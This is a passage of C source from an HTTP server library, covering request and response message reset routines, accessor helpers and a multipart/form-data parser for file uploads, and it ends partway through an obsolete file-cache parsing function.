msg->docuri = http_uri_alloc();
else
http_uri_init(msg->docuri);
msg->req_scheme = NULL;
msg->req_schemelen = 0;
msg->req_host = NULL;
msg->req_hostlen = 0;
msg->req_port = 0;
msg->req_path = NULL;
msg->req_pathlen = 0;
msg->req_query = NULL;
msg->req_querylen = 0;
msg->req_line = NULL;
msg->req_line_len = 0;
msg->req_content_type = NULL;
msg->req_contype_len = 0;
msg->req_useragent = NULL;
msg->req_useragent_len = 0;
msg->req_cookie = NULL;
msg->req_cookie_len = 0;
/* the location of the end of http request header */
msg->req_body_flag = 0;
msg->req_header_length = 0;
msg->req_body_length = 0;
msg->req_body_iolen = 0;
msg->req_chunk_state = 0;
msg->req_chunk_size = -1;
msg->req_chunk_iolen = 0;
msg->req_conn_keepalive = 0;
/* temporary file for storing the request body */
msg->req_multipart = 0;
msg->req_file_cache = 0;
msg->req_file_name = NULL;
if (msg->req_file_handle) {
native_file_close(msg->req_file_handle);
msg->req_file_handle = NULL;
}
if (!msg->req_header_table) {
msg->req_header_table = ht_only_new(mgmt->header_num, hunit_cmp_key);
hunit_set_hashfunc(msg->req_header_table);
}
ht_zero(msg->req_header_table);
if (!msg->req_cookie_table) {
msg->req_cookie_table = ht_only_new(mgmt->header_num, hunit_cmp_key);
hunit_set_hashfunc(msg->req_cookie_table);
}
ht_zero(msg->req_cookie_table);
if (!msg->req_header_list)
msg->req_header_list = arr_new(4);
else {
num = arr_num(msg->req_header_list);
for (i = 0; i < num; i++) {
unit = arr_pop(msg->req_header_list);
if (!unit) continue;
bpool_recycle(mgmt->header_unit_pool, unit);
}
}
arr_zero(msg->req_header_list);
if (!msg->req_header_stream) msg->req_header_stream = frame_new(256);
frame_empty(msg->req_header_stream);
if (!msg->req_body_stream) msg->req_body_stream = frame_new(128);
frame_empty(msg->req_body_stream);
if (!msg->req_stream) msg->req_stream = frame_new(256);
frame_empty(msg->req_stream);
if (msg->req_chunk == NULL) {
msg->req_chunk = http_chunk_alloc();
}
http_chunk_zero(msg->req_chunk);
if (msg->req_body_chunk == NULL) {
msg->req_body_chunk = chunk_new(8192);
}
chunk_zero(msg->req_body_chunk);
if (msg->req_rcvs_list == NULL) {
msg->req_rcvs_list = arr_new(2);
}
arr_zero(msg->req_rcvs_list);
if (msg->req_formlist == NULL) {
msg->req_formlist = arr_new(4);
}
while (arr_num(msg->req_formlist) > 0)
http_form_free(arr_pop(msg->req_formlist));
if (msg->req_form_kvobj) {
kvpair_clean(msg->req_form_kvobj);
msg->req_form_kvobj = NULL;
}
if (msg->req_form_json) {
json_clean(msg->req_form_json);
msg->req_form_json = NULL;
}
if (msg->req_query_kvobj) {
kvpair_clean(msg->req_query_kvobj);
msg->req_query_kvobj = NULL;
}
msg->req_stream_sent = 0;
msg->req_stream_recv = 0;
return 0;
}
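/* reset the response side of an HTTPMsg: status line, header table and
list, body streams, chunk objects, cache file state and receive list. */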
int http_msg_init_res (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
HeaderUnit * unit = NULL;
int i, num;
if (!msg) return -1;
mgmt = (HTTPMgmt *)msg->httpmgmt;
msg->res_status = -500;
msg->res_verloc = 0;
msg->res_verlen = 0;
msg->res_statusloc = 0;
msg->res_statuslen = 0;
msg->res_reasonloc = 0;
msg->res_reasonlen = 0;
if (!msg->res_line) msg->res_line = frame_new(32);
frame_empty(msg->res_line);
msg->res_header_length = 0;
msg->res_body_length = 0;
msg->res_body_iolen = 0;
msg->res_body_flag = BC_CONTENT_LENGTH;
msg->res_conn_keepalive = 0;
if (msg->res_file_handle) {
native_file_close(msg->res_file_handle);
msg->res_file_handle = NULL;
}
if (msg->res_file_name) {
kfree(msg->res_file_name);
msg->res_file_name = NULL;
}
if (msg->res_cache_info) {
cache_info_close(msg->res_cache_info);
msg->res_cache_info = NULL;
}
msg->res_file_cache = 0;
msg->cache_req_start = 0;
msg->cache_req_off = 0;
msg->cache_req_len = -1;
if (!msg->res_header_table) {
msg->res_header_table = ht_only_new(mgmt->header_num, hunit_cmp_key);
hunit_set_hashfunc(msg->res_header_table);
}
ht_zero(msg->res_header_table);
if (!msg->res_header_list)
msg->res_header_list = arr_new(4);
else {
num = arr_num(msg->res_header_list);
for (i=0; i<num; i++) {
unit = arr_pop(msg->res_header_list);
if (!unit) continue;
bpool_recycle(mgmt->header_unit_pool, unit);
}
}
arr_zero(msg->res_header_list);
if (!msg->res_header_stream) msg->res_header_stream = frame_new(4096);
frame_empty(msg->res_header_stream);
if (!msg->res_body_stream) msg->res_body_stream = frame_new(8192);
frame_empty(msg->res_body_stream);
if (!msg->res_stream) msg->res_stream = frame_new(8192);
frame_empty(msg->res_stream);
if (msg->res_chunk == NULL) {
msg->res_chunk = http_chunk_alloc();
}
http_chunk_zero(msg->res_chunk);
if (msg->res_body_chunk == NULL) {
msg->res_body_chunk = chunk_new(8192);
}
chunk_zero(msg->res_body_chunk);
msg->res_stream_sent = 0;
msg->res_stream_recv = 0;
if (msg->res_rcvs_list == NULL) {
msg->res_rcvs_list = arr_new(4);
}
arr_zero(msg->res_rcvs_list);
return 0;
}
void * http_msg_cbobj (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
if (!msg) return NULL;
return msg->cbobj;
}
void * http_msg_obj (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
if (!msg) return NULL;
return &msg->extdata[0];
}
void * http_msg_mgmtobj (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
if (!msg) return NULL;
return http_mgmt_obj(msg->httpmgmt);
}
char * http_msg_get_mime (void * vmsg, char * extname, uint32 * mimeid)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
if (!msg) return "application/octet-stream";
return http_get_mime(msg->httpmgmt, extname, mimeid);
}
void * http_msg_get_mimemgmt (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
HTTPMgmt * mgmt = NULL;
if (!msg) return NULL;
mgmt = (HTTPMgmt *)msg->httpmgmt;
if (!mgmt) return NULL;
return mgmt->mimemgmt;
}
void * http_msg_newmsg (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
if (!msg) return NULL;
return http_msg_fetch(msg->httpmgmt);
}
char * http_msg_srcip (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
if (!msg) return "";
return msg->srcip;
}
int http_msg_srcport (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
if (!msg) return 0;
return msg->srcport;
}
ulong http_msg_id (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
if (!msg) return 0;
return msg->msgid;
}
int http_msg_set_teardown_notify (void * vmsg, void * func, void * para)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
if (!msg) return -1;
msg->tear_down_notify = func;
msg->tear_down_para = para;
return 0;
}
int http_msg_set_response_notify (void * vmsg, void * func, void * para, void * cbval,
char * storefile, int64 offset,
void * procnotify, void * procpara, uint64 proccbval)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
if (!msg) return -1;
msg->resnotify = func;
msg->resnotify_called = 0;
msg->resnotify_para = para;
msg->resnotify_cbval = cbval;
msg->res_store_file = storefile;
msg->res_store_offset = offset;
msg->res_recv_procnotify = procnotify;
msg->res_recv_procnotify_para = procpara;
msg->res_recv_procnotify_cbval = proccbval;
return 0;
}
int http_msg_set_res_recvall_notify (void * vmsg, void * func, void * para, void * cbval)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
if (!msg) return -1;
msg->resnotify = func;
msg->resnotify_called = 0;
msg->resnotify_para = para;
msg->resnotify_cbval = cbval;
return 0;
}
int http_msg_set_res_store_file (void * vmsg, char * storefile, int64 offset)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
if (!msg) return -1;
msg->res_store_file = storefile;
msg->res_store_offset = offset;
return 0;
}
int http_msg_set_res_recvproc_notify (void * vmsg, void * procnotify, void * procpara, uint64 proccbval)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
if (!msg) return -1;
msg->res_recv_procnotify = procnotify;
msg->res_recv_procnotify_para = procpara;
msg->res_recv_procnotify_cbval = proccbval;
return 0;
}
int http_msg_set_req_sendproc_notify (void * vmsg, void * procnotify, void * procpara, uint64 proccbval)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
if (!msg) return -1;
msg->req_send_procnotify = procnotify;
msg->req_send_procnotify_para = procpara;
msg->req_send_procnotify_cbval = proccbval;
return 0;
}
/* 1 - temporary cache file
2 - application-given file for storing response body
3 - proxy cache file with partial content
4 - proxy cache file with all content */
int http_msg_cache_type (void * vmsg, int respornot)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
if (!msg) return 0;
if (respornot) {
return msg->res_file_cache;
} else {
return msg->req_file_cache;
}
return 0;
}
char * http_msg_cache_file (void * vmsg, int respornot)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
if (!msg) return NULL;
if (respornot) {
if (msg->res_file_cache == 1) return msg->res_file_name;
if (msg->res_file_cache == 2) return msg->res_store_file;
} else {
if (msg->req_file_cache == 1) return msg->req_file_name;
}
return NULL;
}
int http_msg_mgmt_add (void * vmgmt, void * vmsg)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPMsg * pmsg = (HTTPMsg *)vmsg;
if (!mgmt) return -1;
if (!pmsg) return -2;
EnterCriticalSection(&mgmt->msgtableCS);
ht_set(mgmt->msg_table, &pmsg->msgid, pmsg);
LeaveCriticalSection(&mgmt->msgtableCS);
return 0;
}
void * http_msg_mgmt_get (void * vmgmt, ulong msgid)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPMsg * pmsg = NULL;
if (!mgmt) return NULL;
EnterCriticalSection(&mgmt->msgtableCS);
pmsg = ht_get(mgmt->msg_table, &msgid);
LeaveCriticalSection(&mgmt->msgtableCS);
return pmsg;
}
void * http_msg_mgmt_del (void * vmgmt, ulong msgid)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPMsg * pmsg = NULL;
if (!mgmt) return NULL;
EnterCriticalSection(&mgmt->msgtableCS);
pmsg = ht_delete(mgmt->msg_table, &msgid);
LeaveCriticalSection(&mgmt->msgtableCS);
return pmsg;
}
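/* store a named script variable in msg->script_var_tab, replacing any
previous value. a negative valuelen means value is NUL-terminated. */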
int http_msg_var_set (void * vmsg, char * name, char * value, int valuelen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
var_obj_t * obj = NULL;
int namelen = 0;
if (!msg) return -1;
if (!name) return -2;
namelen = str_len(name);
if (namelen <= 0) return -3;
if (value && valuelen < 0)
valuelen = strlen(value);
obj = ht_get(msg->script_var_tab, name);
if (!obj) {
obj = var_obj_alloc();
obj->name = str_dup(name, namelen);
obj->namelen = namelen;
ht_set(msg->script_var_tab, name, obj);
} else {
if (obj->value) {
kfree(obj->value);
obj->value = NULL;
}
obj->valuelen = 0;
}
if (value && valuelen >= 0)
obj->value = str_dup(value, valuelen);
obj->valuelen = valuelen;
return 0;
}
int http_msg_var_get (void * vmsg, char * name, char * value, int valuelen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
var_obj_t * obj = NULL;
int len = 0;
if (!msg) return -1;
if (!name) return -2;
len = str_len(name);
if (len <= 0) return -3;
obj = ht_get(msg->script_var_tab, name);
if (!obj) {
return -100;
}
len = obj->valuelen;
if (value && valuelen > 0) {
if (len > valuelen) len = valuelen;
str_secpy(value, valuelen, obj->value, len);
return len;
}
return len;
}
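/* illustrative sketch only (not part of the library): how handler or script
code might exchange a per-message variable through the two helpers above.
the variable name "upstream" is a made-up example.

    char buf[64];

    http_msg_var_set(msg, "upstream", "10.0.0.2:8080", -1);
    if (http_msg_var_get(msg, "upstream", buf, sizeof(buf)) > 0) {
        // use buf here
    }
*/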
<|start_filename|>src/http_form.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "http_msg.h"
#include "http_mgmt.h"
#include "http_header.h"
#include "http_cgi.h"
#include "http_form.h"
int multipart_conttype_parse (void * vmsg, char ** pboundary, int * plen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
char * pbgn = NULL;
char * poct = NULL;
char * pend = NULL;
HeaderUnit * punit = NULL;
static char * formtype = "multipart/form-data";
int len = 0;
if (!msg) return -1;
punit = http_header_get(msg, 0, "Content-Type", 12);
if (!punit) return -10;
/* compare the mime type
Content-Type: multipart/form-data; boundary=---------------------------7d706402a6
*/
pbgn = HUValue(punit);
pend = pbgn + punit->valuelen;
pbgn = skipOver(pbgn, pend-pbgn, " \t", 2);
if (!pbgn || pbgn >= pend) return -100;
len = str_len(formtype);
if (pend - pbgn < len) return -101;
if (strncasecmp(pbgn, formtype, len) != 0)
return -200;
/* parse the boundary string, pbgn skips to the beginning of the key 'boundary' */
pbgn += len;
pbgn = skipOver(pbgn, pend-pbgn, ";, \t", 4);
if (!pbgn || pbgn >= pend) return -201;
poct = skipTo(pbgn, pend-pbgn, "=", 1);
if (!poct || poct >= pend) return -204;
/* pbgn skips to the beginning of the boundary value */
pbgn = skipOver(poct + 1, pend - poct - 1, " \t", 2);
if (!pbgn || pbgn >= pend) return -205;
poct = skipTo(pbgn, pend-pbgn, " \t,;\r\n", 6);
if (!poct) return -202;
if (poct <= pbgn) return -203;
len = poct - pbgn;
if (pboundary) *pboundary = pbgn;
if (plen) *plen = len;
return 1;
}
void * http_form_alloc()
{
http_form_t * form = NULL;
form = kzalloc(sizeof(*form));
return form;
}
void http_form_free (void * vform)
{
http_form_t * form = (http_form_t *)vform;
if (!form) return;
if (form->name)
kfree(form->name);
if (form->ctype)
kfree(form->ctype);
if (form->filename)
kfree(form->filename);
if (form->basename)
kfree(form->basename);
kfree(form);
}
void * http_form_node (void * vmsg, char * key)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
http_form_t * form = NULL;
int i, num;
if (!msg || !key) return NULL;
num = arr_num(msg->req_formlist);
for (i = 0; i < num; i++) {
form = arr_value(msg->req_formlist, i);
if (!form) continue;
if (form->name && strcasecmp(key, form->name) == 0) {
return form;
}
}
return NULL;
}
int http_form_get (void * vmsg, char * key, char ** ctype, uint8 * formtype, char ** fname, int64 * valuelen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
http_form_t * form = NULL;
int i, num;
if (!msg) return -1;
if (!key) return -2;
num = arr_num(msg->req_formlist);
for (i = 0; i < num; i++) {
form = arr_value(msg->req_formlist, i);
if (!form) continue;
if (form->name && strcasecmp(key, form->name) == 0) {
if (ctype) *ctype = form->ctype;
if (formtype) *formtype = form->formtype;
if (fname) *fname = form->filename;
if (valuelen) *valuelen = form->valuelen;
return 1;
}
}
return -100;
}
int http_form_value (void * vmsg, char * key, char * value, int64 valuelen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
http_form_t * form = NULL;
int i, num;
if (!msg) return -1;
if (!key) return -2;
num = arr_num(msg->req_formlist);
for (i = 0; i < num; i++) {
form = arr_value(msg->req_formlist, i);
if (!form) continue;
if (form->name && strcasecmp(key, form->name) == 0) {
return chunk_read(form->body_chunk, value, form->valuepos, valuelen, 0);
}
}
return -100;
}
int http_form_valuep (void * vmsg, char * key, int64 pos, char ** pvalue, int64 * valuelen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
http_form_t * form = NULL;
int i, num;
if (!msg) return -1;
if (!key) return -2;
num = arr_num(msg->req_formlist);
for (i = 0; i < num; i++) {
form = arr_value(msg->req_formlist, i);
if (!form) continue;
if (form->name && strcasecmp(key, form->name) == 0) {
if (pos < 0 || pos >= form->valuelen)
return -16;
return chunk_read_ptr(form->body_chunk, form->valuepos + pos,
form->valuelen - pos, (void **)pvalue, valuelen, 0);
}
}
return -100;
}
int http_form_tofile (void * vmsg, char * key, int filefd)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
http_form_t * form = NULL;
int i, num;
if (!msg) return -1;
if (!key) return -2;
num = arr_num(msg->req_formlist);
for (i = 0; i < num; i++) {
form = arr_value(msg->req_formlist, i);
if (!form) continue;
if (form->name && strcasecmp(key, form->name) == 0) {
return chunk_readto_file(form->body_chunk, filefd, form->valuepos, form->valuelen, 0);
}
}
return -100;
}
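/* illustrative sketch only (not part of the library): once the request body
has been parsed into msg->req_formlist (e.g. via msg->ParseReqMultipartForm(msg, NULL)),
a handler might save an uploaded file like this. the field name
"TUploadFile" and the output path are made-up examples; open/close need
<fcntl.h> and <unistd.h>.

    char * ctype = NULL;
    char * fname = NULL;
    uint8 formtype = 0;
    int64 vallen = 0;
    int fd;

    if (http_form_get(msg, "TUploadFile", &ctype, &formtype, &fname, &vallen) > 0
        && formtype == 1)
    {
        fd = open("/tmp/upload.bin", O_CREAT | O_WRONLY, 0644);
        if (fd >= 0) {
            http_form_tofile(msg, "TUploadFile", fd);
            close(fd);
        }
    }
*/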
int http_form_data_parse (void * vnode, char * cdisp, int displen)
{
http_form_t * node = (http_form_t *)vnode;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pval = NULL;
char * ptmp = NULL;
int len = 0;
if (!node) return -1;
/* Content-Disposition: form-data; name="TUploadFile"; filename="D:\tools\readme.txt" */
pbgn = cdisp; pend = pbgn + displen;
if (displen < 9 || strncasecmp(pbgn, "form-data", 9) != 0)
return -100;
pbgn += 9;
for (poct = pbgn; poct < pend; ) {
pbgn = skipOver(poct, pend-poct, " \t,;", 4);
if (pbgn >= pend) break;
poct = skipQuoteTo(pbgn, pend-pbgn, ";, \t", 4);
if (!poct) return -100;
pval = skipQuoteTo(pbgn, poct-pbgn, "=", 1);
if (!pval || pval >= poct) continue;
ptmp = rskipOver(pval-1, pval-pbgn, " \t", 2);
if (ptmp < pbgn) continue;
if (ptmp - pbgn + 1 == 4 && strncasecmp(pbgn, "name", 4) == 0) {
pbgn = skipOver(pval+1, poct-pval-1, " \t=\"'", 5);
if (pbgn >= poct) continue;
ptmp = rskipOver(poct-1, poct-pbgn, " \t=\"'", 5);
if (ptmp < pbgn) continue;
len = ptmp - pbgn + 1;
node->name = str_dup(pbgn, len);
} else if (ptmp - pbgn + 1 == 8 && strncasecmp(pbgn, "filename", 8) == 0) {
pbgn = skipOver(pval+1, poct-pval-1, " \t=\"'", 5);
if (pbgn >= poct) continue;
ptmp = rskipOver(poct-1, poct-pbgn, " \t=\"'", 5);
if (ptmp < pbgn) continue;
pval = rskipTo(ptmp, ptmp-pbgn+1, "\\/", 2);
if (!pval || pval < pbgn) pval = pbgn;
else pval++;
len = ptmp - pval + 1;
node->filename = str_dup(pval, len);
node->formtype = 1;
pbgn = node->filename;
pval = pbgn + len;
pval = rskipTo(pval-1, pval-pbgn, ".", 1);
if (pval <= pbgn) {
node->extname = "";
node->basename = str_dup(pbgn, len);
} else {
node->extname = pval;
node->basename = str_dup(pbgn, pval - pbgn);
}
}
}
return 0;
}
/* the multipart format is usually used for uploading multiple pieces of content by POST.
its Content-Type header is:
Content-Type: multipart/form-data; boundary=---------------------------7d706402a6
the request body is laid out as follows:
<boundary string>\r\n
Content-Disposition: form-data; name="TUploadFile"; filename="D:\tools\readme.txt"
Content-Type: text/plain
\r\n\r\n
<body content>\r\n
<boundary string>\r\n
Content-Disposition: form-data; name="TFileDesc"
\r\n\r\n
<form data>\r\n
<boundary string>--\r\n
*/
int http_form_multipart_parse (void * vmsg, arr_t * formlist)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
chunk_t * chk = NULL;
ckpos_vec_t vec;
int64 iter = 0;
int64 fsize = 0;
int ret = 0;
int64 hdbgn = 0;
int64 hdend = 0;
int64 valpos = 0;
int64 endpos = 0;
int64 bodypos = 0;
int bodylen = 0;
int namelen, valuelen;
char pname[128];
char pvalue[256];
char * boundary;
int blen = 0;
http_form_t * node = NULL;
pat_bmvec_t * patvec1 = NULL;
pat_bmvec_t * patvec2 = NULL;
if (!msg) return -1;
if ((chk = msg->req_body_chunk) == NULL)
return -2;
if (multipart_conttype_parse(msg, &boundary, &blen) < 0)
return -100;
/* parse the request body that contains the form data and file content */
patvec1 = pat_bmvec_alloc(boundary, blen, 0);
patvec2 = pat_bmvec_alloc("\r\n\r\n", 4, 0);
memset(&vec, 0, sizeof(vec));
fsize = chunk_size(chk, 0);
iter = 0;
iter = bm_find_chunk(chk, iter, boundary, blen, patvec1, NULL);
if (iter < 0) {
ret = -100;
goto err_exit;
}
while (iter < fsize) {
iter = iter + blen;
if (fsize - iter == 4 &&
chunk_char(chk, iter + 0, &vec, NULL) == '-' &&
chunk_char(chk, iter + 1, &vec, NULL) == '-' &&
chunk_char(chk, iter + 2, &vec, NULL) == '\r' &&
chunk_char(chk, iter + 3, &vec, NULL) == '\n')
{ ret = 0; goto err_exit; }
iter += 2;
if (iter >= fsize) goto err_exit;
hdend = iter;
bodypos = bm_find_chunk(chk, iter, "\r\n\r\n", 4, patvec2, NULL);
if (bodypos < 0) { ret = 0; goto err_exit;}
bodypos += 4;
endpos = bm_find_chunk(chk, bodypos, boundary, blen, patvec1, NULL);
if (endpos < 0) { ret = -350; goto err_exit; }
iter = endpos;
endpos = chunk_rskip_to(chk, endpos-1, endpos - bodypos, "\r", 1);
if (endpos < 0 || endpos < bodypos) { ret = -360; goto err_exit; }
bodylen = endpos - bodypos;
/* now parse the headers in this section of multipart body */
node = http_form_alloc();
node->valuepos = bodypos;
node->valuelen = bodylen;
while (hdend < bodypos - 4) {
hdbgn = chunk_skip_over(chk, hdend, bodypos-2-hdend, " \t\r\n,;", 6);
if (hdbgn < 0 || hdbgn >= bodypos-2) break;
hdend = chunk_skip_to(chk, hdbgn, bodypos-2-hdbgn, "\r\n", 2);
if (hdend < 0 || hdend >= bodypos-2) break;
valpos = chunk_skip_to(chk, hdbgn, hdend-hdbgn, ":", 1);
if (valpos < 0 || valpos >= hdend) continue;
endpos = chunk_rskip_over(chk, valpos-1, valpos-hdbgn, " \t", 2);
if (endpos < 0 || endpos < hdbgn) continue;
namelen = endpos - hdbgn + 1;
valpos = chunk_skip_over(chk, valpos+1, hdend-valpos-1, " \t", 2);
endpos = chunk_rskip_over(chk, hdend-1, hdend-valpos, " \t", 2);
if (endpos < 0 || endpos < valpos) continue;
valuelen = endpos - valpos + 1;
memset(pname, 0, sizeof(pname));
if (namelen > sizeof(pname) - 1) namelen = sizeof(pname) -1;
chunk_read(chk, pname, hdbgn, namelen, 0);
memset(pvalue, 0, sizeof(pvalue));
if (valuelen > sizeof(pvalue) - 1) valuelen = sizeof(pvalue) -1;
chunk_read(chk, pvalue, valpos, valuelen, 0);
if (namelen == 19 && strncasecmp(pname, "Content-Disposition", 19) == 0) {
http_form_data_parse(node, pvalue, valuelen);
} else if (namelen == 12 && strncasecmp(pname, "Content-Type", 12) == 0) {
node->ctype = str_dup(pvalue, valuelen);
}
}
node->body_chunk = chk;
node->filecache = msg->req_file_cache;
if (formlist)
arr_push(formlist, node);
else
arr_push(msg->req_formlist, node);
}
err_exit:
pat_bmvec_free(patvec1);
pat_bmvec_free(patvec2);
return ret;
}
/* the following code is obsoleted by the functions above */
static int parse_form_node (FormDataNode * node, char * pvalue, int valuelen, char * path)
{
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pval = NULL;
char * ptmp = NULL;
int len = 0;
if (!node) return -1;
/* Content-Disposition: form-data; name="TUploadFile"; filename="D:\tools\readme.txt" */
pbgn = pvalue; pend = pbgn + valuelen;
if (valuelen < 9 || strncasecmp(pbgn, "form-data", 9) != 0)
return -100;
pbgn += 9;
for (poct = pbgn; poct < pend; ) {
pbgn = skipOver(poct, pend-poct, " \t,;", 4);
if (pbgn >= pend) break;
poct = skipQuoteTo(pbgn, pend-pbgn, ";, \t", 4);
if (!poct) return -100;
pval = skipQuoteTo(pbgn, poct-pbgn, "=", 1);
if (!pval || pval >= poct) continue;
ptmp = rskipOver(pval-1, pval-pbgn, " \t", 2);
if (ptmp < pbgn) continue;
if (ptmp - pbgn + 1 == 4 && strncasecmp(pbgn, "name", 4) == 0) {
pbgn = skipOver(pval+1, poct-pval-1, " \t=\"'", 5);
if (pbgn >= poct) continue;
ptmp = rskipOver(poct-1, poct-pbgn, " \t=\"'", 5);
if (ptmp < pbgn) continue;
len = ptmp - pbgn + 1;
memset(node->var, 0, sizeof(node->var));
if (len > sizeof(node->var)-1) len = sizeof(node->var)-1;
memcpy(node->var, pbgn, len);
} else if (ptmp - pbgn + 1 == 8 && strncasecmp(pbgn, "filename", 8) == 0) {
pbgn = skipOver(pval+1, poct-pval-1, " \t=\"'", 5);
if (pbgn >= poct) continue;
ptmp = rskipOver(poct-1, poct-pbgn, " \t=\"'", 5);
if (ptmp < pbgn) continue;
pval = rskipTo(ptmp, ptmp-pbgn+1, "\\/", 2);
if (!pval || pval < pbgn) pval = pbgn;
else pval++;
memset(node->filename, 0, sizeof(node->filename));
memset(node->basename, 0, sizeof(node->basename));
memset(node->extname, 0, sizeof(node->extname));
memset(node->path, 0, sizeof(node->path));
len = ptmp - pval + 1;
if (len > sizeof(node->filename)-1) len = sizeof(node->filename)-1;
memcpy(node->filename, pval, len);
node->fileflag = 1;
pbgn = node->filename, pval = pbgn + str_len(node->filename);
ptmp = rskipTo(pval-1, pval-pbgn, ".", 1);
if (ptmp > pbgn && ptmp < pval-1 && *ptmp=='.') {
len = ptmp-pbgn;
if (len > sizeof(node->basename)-1) len = sizeof(node->basename)-1;
memcpy(node->basename, pbgn, len);
len = pval-ptmp;
if (len > sizeof(node->extname)-1) len = sizeof(node->extname)-1;
memcpy(node->extname, ptmp, len);
} else {
len = pval-pbgn;
if (len > sizeof(node->basename)-1) len = sizeof(node->basename)-1;
memcpy(node->basename, pbgn, len);
}
if (path && (len=str_len(path))>0) {
if (len > sizeof(node->path)-1) len = sizeof(node->path)-1;
memcpy(node->path, path, len);
}
}
}
return 0;
}
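/* obsolete path: parse the multipart body directly from the request cache
file via the fbuf_* routines, filling FormDataNode entries into formlist.
superseded by http_form_multipart_parse above. */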
int parse_req_multipart_filecache (void * vmsg, char * boundary, int blen, char * path, arr_t * formlist)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
FormDataNode * node = NULL;
char pname[64];
char pvalue[256];
int64 iter = 0;
int64 fsize = 0;
int ret = 0;
pat_bmvec_t * patvec1 = NULL;
pat_bmvec_t * patvec2 = NULL;
void * fbf = NULL;
int64 pos = 0;
int64 hdbgn = 0;
int64 hdend = 0;
int64 valpos = 0;
int64 endpos = 0;
int64 bodypos = 0;
int bodylen = 0;
int namelen = 0;
int valuelen = 0;
if (!msg) return -1;
if (!formlist) return -2;
if (!msg->req_file_cache || !msg->req_multipart) return -100;
fbf = fbuf_init(msg->req_file_name, 64);
if (!fbf) return -200;
patvec1 = pat_bmvec_alloc(boundary, blen, 1);
patvec2 = pat_bmvec_alloc("\r\n\r\n", 4, 1);
fsize = fbuf_size(fbf);
iter = 0;
pos = bm_find_filebuf(fbf, iter, boundary, blen, 0, patvec1, NULL);
if (pos < 0) {
ret = -100;
goto err_exit;
}
while (iter < fsize) {
iter = pos + blen;
if (fsize - iter <= 4) { ret = 0; goto err_exit; }
iter += 2;
hdbgn = iter;
pos = bm_find_filebuf(fbf, iter, "\r\n\r\n", 4, 0, patvec2, NULL);
if (pos < 0) { ret = 0; goto err_exit;}
bodypos = pos + 4;
pos = bm_find_filebuf(fbf, iter, boundary, blen, 0, patvec1, NULL);
if (pos < 0) { ret = -350; goto err_exit; }
endpos = fbuf_rskip_to(fbf, pos, pos - bodypos, "\r", 1);
if (endpos < 0 || endpos < bodypos) { ret = -360; goto err_exit; }
bodylen = endpos - bodypos;
/* now parse the headers in this section of multipart body */
node = kzalloc(sizeof(*node));
node->bodypos = bodypos;
node->bodylen = bodylen;
hdend = hdbgn;
while (hdend < bodypos - 4) {
fbuf_mmap(fbf, hdend);
hdbgn = fbuf_skip_over(fbf, hdend, bodypos-2-hdend, " \t\r\n,;", 6);
if (hdbgn < 0 || hdbgn >= bodypos-2) break;
hdend = fbuf_skip_to(fbf, hdbgn, bodypos-2-hdbgn, "\r\n", 2);
if (hdend < 0 || hdend >= bodypos-2) break;
valpos = fbuf_skip_to(fbf, hdbgn, hdend-hdbgn, ":", 1);
if (valpos < 0 || valpos >= hdend) continue;
endpos = fbuf_rskip_over(fbf, valpos-1, valpos-hdbgn, " \t", 2);
if (endpos < 0 || endpos < hdbgn) continue;
namelen = endpos - hdbgn + 1;
valpos = fbuf_skip_over(fbf, valpos+1, hdend-valpos-1, " \t", 2);
endpos = fbuf_rskip_over(fbf, hdend-1, hdend-valpos, " \t", 2);
if (endpos < 0 || endpos < valpos) continue;
valuelen = endpos - valpos + 1;
memset(pname, 0, sizeof(pname));
if (namelen > sizeof(pname) - 1) namelen = sizeof(pname) -1;
fbuf_read(fbf, hdbgn, pname, namelen);
memset(pvalue, 0, sizeof(pvalue));
if (valuelen > sizeof(pvalue) - 1) valuelen = sizeof(pvalue) -1;
fbuf_read(fbf, valpos, pvalue, valuelen);
if (namelen == 19 && strncasecmp(pname, "Content-Disposition", 19) == 0) {
parse_form_node(node, pvalue, valuelen, path);
} else if (namelen == 12 && strncasecmp(pname, "Content-Type", 12) == 0) {
node->typelen = valuelen;
if (valuelen > sizeof(node->conttype) - 1)
valuelen = sizeof(node->conttype) - 1;
memcpy(node->conttype, pvalue, valuelen);
}
}
node->filecache = msg->req_file_cache;
strncpy(node->filecachename, msg->req_file_name, sizeof(node->filecachename)-1);
arr_push(formlist, node);
if (node->fileflag == 0) {
if (bodylen > sizeof(node->bodycont) - 1) bodylen = sizeof(node->bodycont) -1;
fbuf_read(fbf, node->bodypos, node->bodycont, bodylen);
}
}
